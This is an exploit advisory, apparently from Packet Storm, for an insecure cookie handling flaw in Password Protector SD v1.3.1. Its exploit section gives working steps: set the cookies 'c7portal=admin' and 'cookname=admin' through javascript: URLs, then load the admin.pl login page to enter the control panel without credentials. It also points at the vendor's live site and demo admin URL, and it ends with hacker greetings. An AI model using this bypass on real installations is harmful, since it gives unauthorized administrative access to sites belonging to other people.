Password Protector SD version 1.3.1 suffers from an insecure cookie handling vulnerability.
e281cf16cdc383b69329c5073a2f6c6934f6bc7440f82f09bc1fe6b93008bea0=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";
step 2 [add]: javascript:document.cookie="cookname=admin;path=/";
step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home
in control panel :
http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home
demo:
-----
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE
all my Friends
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Subscribe to an RSS Feed